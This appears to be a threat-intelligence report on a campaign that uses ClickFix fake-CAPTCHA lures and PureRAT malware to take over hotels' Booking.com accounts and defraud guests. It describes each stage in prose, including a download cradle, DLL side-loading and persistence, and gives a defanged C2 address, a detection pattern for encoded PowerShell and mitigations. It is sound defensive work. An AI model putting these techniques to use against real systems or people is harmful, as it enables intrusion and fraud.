ClickFix
Sophisticated phishing campaign compromises hotel Booking.com accounts, enabling...
The "I Paid Twice" campaign represents a paradigm shift in cybercriminal operations, moving from broad phishing to a targeted, multi-faceted attack on the digital trust chain within the hospitality industry. This report provides a forensic-level dissection of the attack lifecycle, from initial social engineering to final monetization.
The sophisticated interplay of the **ClickFix social engineering technique**, the **PureRAT malware-as-a-service (MaaS) platform**, and a specialized criminal underground economy, this Threatfeed illuminates the technical nuances that make this campaign both highly effective and resilient.
## **Attack Ecosystem**
The campaign is not a singular attack but a **criminal enterprise** with distinct, specialized roles. It systematically targets hotels to compromise their Booking.com accounts, subsequently using that access to defraud customers. The technical execution reveals a high degree of professionalism, leveraging known techniques in novel combinations.
* **Primary Vector:** Spear-phishing against hotel staff.
* **Key Malware:** PureRAT, a .NET-based Remote Access Trojan.
* **Monetization Method:** Business Email Compromise (BEC)-style fraud against hotel guests.
* **Ecosystem Support:** Underground markets for credentials, malware distribution, and verification tools.
## **Dissection of the Attack Chain**
The attack can be segmented into four distinct, interconnected phases, as illustrated below, forming a complete cyber kill chain.
```mermaid
flowchart TD
subgraph A [Phase 1: Initial Compromise]
direction LR
A1[Spear-phishing Email] --> A2[Redirection Chain TDS] --> A3[ClickFix Lure]
end
subgraph B [Phase 2: Malware Deployment]
direction LR
B1[PowerShell Execution] --> B2[Reconnaissance] --> B3[Persistence &<br>DLL Side-Loading]
end
subgraph C [Phase 3: Persistence & C2]
C1[PureRAT MaaS] --> C2[C2 Communication]
end
subgraph D [Phase 4: Monetization]
direction LR
D1[Credential Theft] --> D2[Guest Fraud]
end
A --> B --> C --> D
```
### **Initial Compromise & ClickFix Lure**
This phase relies entirely on sophisticated social engineering to induce a user-initiated code execution.
* **Weaponized Communication:**
* **Source:** Emails originate from previously compromised, legitimate email accounts of other hotels, bypassing reputation-based filters.
* **Lure Content:** Impersonates Booking.com with subjects like "New guest message about reservation – Tracking code: [Unique ID]". This creates a sense of urgency and legitimacy.
* **Traffic Distribution System (TDS):**
* The link within the email does not point directly to the payload. It leads to a redirection chain. Analysis shows the initial domain uses JavaScript to check the `window.self !== window.top` condition, forcing a navigation if loaded in an iframe. This anti-analysis technique helps evade sandboxed environments.
* This TDS infrastructure, potentially a paid service, obscures the final payload URL and provides resilience against takedowns.
* **The ClickFix Technique (Core Innovation):**
* The final landing page is a highly convincing clone of a Booking.com login portal, complete with branding.
* A fake CAPTCHA is presented. The critical element is a JavaScript function that automatically copies a malicious PowerShell command to the victim's clipboard upon loading the page.
* The user is then instructed (via on-screen text) to press `Win + R`, paste the command, and press Enter. This technique is highly effective because it:
1. **Bypasses Email Filters:** No malicious attachment is sent.
2. **Exploits User Trust:** The request appears to be a legitimate troubleshooting step.
3. **Achieves Code Execution:** It directly leverages the user's authority to run system commands.
### **Malware Deployment & Persistence**
The execution of the pasted command initiates an automated, fileless deployment sequence.
1. **Scripted Payload Retrieval:**
* The initial PowerShell command is a download cradle that fetches a second, more complex PowerShell script from the attacker's server.
* This secondary script performs reconnaissance, collecting system data (Hostname, Username, OS, AV product) and exfiltrating it to the C2 server.
2. **Payload Delivery and Composition:**
* The script then downloads a ZIP archive containing:
* One legitimate, signed executable (e.g., `libcef.dll` or `AudioSession.exe`).
* Three malicious DLLs.
* The files are extracted to a user-writable directory, typically `%AppData%\Local`.
3. **Persistence and Execution Mechanism:**
* **Persistence:** Established via a Run Registry Key and a shortcut in the Startup folder.
* **DLL Side-Loading:** The legitimate executable is vulnerable to DLL hijacking. When executed, it attempts to load a required DLL from its local directory. Instead, it loads the malicious DLL placed there by the attacker.
* **Fileless Loading:** The malicious DLL acts as a loader, which then reflectively loads the PureRAT payload directly into memory. This avoids writing the primary malware binary to disk, evading signature-based detection.
### **Command and Control with PureRAT**
PureRAT is a fully-featured MaaS platform, providing the attackers with deep and persistent access.
* **Core Capabilities:** The RAT provides a comprehensive suite of spying and control functions, including:
* Remote Desktop Control (VNC-like)
* Keylogging and File System Management
* Webcam and Microphone Capture
* Traffic Proxying (enabling attackers to use the victim's network)
* Data Exfiltration
* **Modular Architecture:** PureRAT uses a plugin system. The core agent can be instructed by the C2 server to download and execute additional modules, such as:
* `PluginRemoteDesktop`
* `PluginExecuting`
* `PluginFileManager`
This modularity makes the malware highly adaptable.
* **Communication and Obfuscation:**
* **C2 Protocol:** Communication with the C2 server (e.g., `45[.]142[.]166[.]73:56001`) is conducted over **encrypted TLS sockets**, blending with normal web traffic.
* **Fingerprinting:** Upon connection, the RAT transmits a detailed system fingerprint to the C2.
* **Obfuscation:** The PureRAT payload is protected by **.NET Reactor**, a commercial obfuscator that complicates static analysis and reverse engineering.
### **The "I Paid Twice" Fraud**
With persistent access, the attackers shift to their primary financial goal.
* **Credential Harvesting:** Using keyloggers, memory dumpers, or simply browsing stolen files, attackers harvest credentials for the hotel's Booking.com extranet portal.
* **The Fraudulent Act:**
* Attackers access the portal using stolen cookies or credentials to view genuine, upcoming reservations.
* They impersonate the hotel and contact guests via **WhatsApp or email**, often just before check-in.
* The message claims a "problem with the bank" or a "security issue" and urges the guest to confirm their payment by wiring funds to a new, attacker-controlled bank account.
* The use of legitimate guest and reservation details makes the scam highly convincing, leading to victims paying twice.
## **Underlying Criminal Infrastructure**
The campaign's efficiency stems from a professionalized cybercrime ecosystem.
* **Credential Markets:** Stolen Booking.com credentials are sold on underground forums like **LolzTeam**. Listings are detailed, including the number of views, last login, and price (typically $50-$500).
* **Verification Tools:** "Log checkers" are sold as services (e.g., ~$40) to automatically verify the validity of stolen credentials through proxies, ensuring they are valuable before purchase.
* **Malware Distribution:** The initial infection is potentially carried out by specialized actors known as "traffers" who are paid for successful installations.
## **A Multi-Layered Strategy**
Defense requires a focus on the specific techniques used at each stage of the attack.
**Table 1: MITRE ATT&CK Mapping and Mitigations**
| Phase | Tactic | Technique (ID) | Mitigation Strategy |
| :--- | :--- | :--- | :--- |
| **Initial Access** | Phishing [T1566] | Spear-phishing Link [T1566.002] | **User Training:** Drill the "Never copy-paste & run commands" rule. Use email security that rewrites/checks URLs in real-time. |
| **Execution** | Execution [T1059] | PowerShell [T1059.001] | **Restrict PowerShell:** Constrain language mode. Log ScriptBlock logging. Use AMSI. |
| **Persistence** | Persistence [T1547] | Registry Run Keys [T1547.001] | **Endpoint Protection:** Use EDR/NGAV to monitor for registry modifications and DLL side-loading patterns. |
| **Defense Evasion** | Defense Evasion [T1574] | DLL Side-Loading [T1574.002] | **Application Control:** Implement application whitelisting (e.g., AppLocker, WDAC). |
| **C2 & Exfiltration** | Command & Control [T1071] | Application Layer Protocol (TLS) [T1071.001] | **Network Monitoring:** Monitor for anomalous outbound connections to rare ports (5600X). Use SSL/TLS inspection where policy allows. |
| **Impact** | Impact [T1657](Financial Theft) | Fraudulent Transactions [T1656] | **Process & Policy:** Mandate multi-factor authentication (MFA) on all booking platform accounts. Educate customers to only pay through official, secure channels. |
### **Proactive Hunting Tips:**
* **Hunt for ClickFix:** Search for PowerShell commands with parameters like `-win normal -enc` (a base64 encoded command) in command-line logs.
* **Hunt for PureRAT:** Look for network connections on ports 56001-56003 and processes with names like `AudioSession.exe` making suspicious network calls.
* **Monitor for Persistence:** Audit Run keys and Startup folder contents for unexpected entries.
The "I Paid Twice" campaign is a potent reminder that modern cyber threats are complex, service-driven businesses. Its technical sophistication lies not in zero-day exploits, but in the masterful combination of social engineering ("ClickFix"), robust malware (PureRAT), and a specialized criminal economy. Defense is challenging but achievable through a layered security posture that emphasizes **user awareness**, **strict application control**, **robust endpoint detection and response**, and **enforcement of security policies** like MFA. Continuous threat intelligence regarding the evolving TTPs of such actors is paramount for organizations within the targeted sectors to protect their assets and, crucially, their customers' trust.
